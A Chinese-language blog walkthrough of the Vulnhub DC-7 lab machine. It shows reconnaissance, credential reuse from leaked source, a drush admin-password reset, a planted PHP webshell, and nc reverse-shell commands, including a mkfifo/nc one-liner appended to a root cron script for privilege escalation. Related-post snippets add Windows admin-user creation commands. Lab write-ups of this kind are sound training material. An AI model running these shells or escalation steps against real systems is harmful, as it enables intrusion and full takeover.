DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)

已于 2022-08-13 20:32:04 修改
阅读量1.1k 收藏
点赞数
分类专栏: DC靶机-渗透测试 文章标签: 网络 服务器 运维
于 2022-08-13 20:23:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/single_g_l/article/details/126319163
版权

目录

一、环境

二、信息收集

1、nmap端口探测

2、访问80端口

3、查询DC7USER,有结果,我把源码下载了下来 

4、22端口开放,用户名 dc7user 密码 MdR3xOgB7#dW ,SSH登录成功

三、漏洞利用

1、drush修改admin密码,登录成功

2、反弹shell

3、提权,写入反弹shell到backups.sh中,拿到root权限

4、拿到flag

一、环境

靶机:192.168.1.196

攻击机:kali

二、信息收集

1、nmap端口探测

端口80,22,25,110开放

root@kali2022:~# nmap 192.168.1.196
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-13 14:03 CST
Nmap scan report for 192.168.1.196
Host is up (0.0011s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3

Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds

2、访问80端口

wappalyzer插件查看网站:内部管理系统(CMS)--Drupal8,编程语言--PHP,Web服务器--Apache2.4.25,操作系统--Debian 

没用上呀--【查询CMS Drupal8 存在(CVE-2018-7600), Apache2.4.25 存在(CVE-2019-0211)】

3、查询DC7USER,有结果,我把源码下载了下来 

查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

4、22端口开放,用户名 dc7user 密码 MdR3xOgB7#dW ,SSH登录成功

root@kali2022:~# ssh dc7user@192.168.1.196
The authenticity of host '192.168.1.196 (192.168.1.196)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.1.196' (ED25519) to the list of known hosts.
dc7user@192.168.1.196's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ ls
backups  mbox

# 发现两个文件,进入backups目录,发现两个文件,gpg后缀的,百度发现
# gpg是一种基于密钥的加密方式,使用了一对密钥对消息进行加密和解密,来保证消息的安全传输。

# cat mbox 发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh

三、漏洞利用

1、drush修改admin密码,登录成功

dc7user@dc-7:/opt/scripts$ cat backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

发现了drush 。网上查询后,发现drush 是drupal shell 专门管理drupal站点的shell

进入到/var/www/html目录下,使用drush命令可以修改admin用户的密码为admin123

drush  user-password admin --password='admin123'

# 我登录admin,明明账号密码时正确的,已知显示账号或密码错误,等超过5次之后,显示被锁。解锁之后,账号才成功登录。

drush php-eval 'db_query("delete from flood");'

2、反弹shell

找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。

来到欢迎页面,对该页面进行编辑,添加一句话PHP代码,保存为php代码

中国蚁剑成功连接shell

(www-data:/var/www/html) $ pwd
/var/www/html
(www-data:/var/www/html) $ whoami   
www-data   # 当前用户是www-data,

用kali再次监听 

nc -lvvp 2222  (kali中执行)
nc -e /bin/bash 192.168.1.196 2222 (蚁剑终端执行)
python -c 'import pty;pty.spawn("/bin/bash")' (进入交互式界面)

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell 

3、提权,写入反弹shell到backups.sh中,拿到root权限

写入反弹shell代码到backups.sh脚本文件,并在kali监听2222端口,稍等片刻后,成功getshell。

方法1
echo nc -e 192.168.1.123 2222 /bin/bash >> backups.sh
nc -lvvp 2222

方法2
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.123 1234 >/tmp/f" >> backups.sh
nc -lvvp 1234

4、拿到flag

获取root权限后,查看mail下的dc7user文件,cd到root目录下,拿到flag 

小小丸子551
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NC提权详细教程
12-04
NC提权 详细教程附带CMD命令 NC反弹 然后进行查看端口 netstat -an 进行连接 cd\ cd 360rec quert user C:\360Rec\churrasco.exe "logoff id" churrasco.exe "net user yuqing1453 4520829 /add" churrasco.exe "net localgroup administrators add /add" 首先执行命令 CMD。EXE 现在来执行NC命令 连接 本地远程访问反弹 就用这个吧~~ 换一个 命令成功完成。 这个YUQING1453是我之前的 命令成功完成。
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 544
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
DC-7靶场
最新发布
mlws1900的博客
03-27 748
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
MS17-010(永恒之蓝)漏洞分析与复现并通过NC提权
weixin_49905950的博客
06-05 436
讲解如何利用永恒之蓝攻击 win2008 靶机并植入nc木马,让win7在开机启动注册表中添加内容,实现nc.exe开机自启。并在kali里面进行连接,验证上述操作是否成功。
DC-7靶机详细渗透步骤
wwxxss
11-04 635
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
cmd+lcx+nc+sc提权工具总结
JackLiu16的博客
02-28 1149
lcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器...
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 815
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
DC-7渗透笔记
现代鲁滨逊的博客
05-12 230
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
第三方组件提权-zend nc提权、Zend反弹shell提权
Love&Share
11-21 1194
文章目录Zend NC提权Zend反弹shell提权工具 在 PHP 里边有一个扩展 zend,这个是解析 PHP zend 脚本加密文件 关于Zend扩展的详细介绍:https://learnku.com/docs/php-internals/php7/zend-extension/7228 如果 服务器安装了 zend ZendExtensionManager.dll 权限可以修改、写入 那就可以用其他 dll 文件替换原来的文件来进行提权操作 靶机:http://www.demoasp.com.
渗透测试DC-7靶机
Ciyaso的博客
08-23 248
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 880
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
DC-7靶机渗透测试
今天不学习 明天变垃圾
04-30 333
DC-7
【Vulnhub靶机DC-7
过期的秋刀鱼
08-09 488
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
渗透DC-1靶机设计思路
05-24
可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值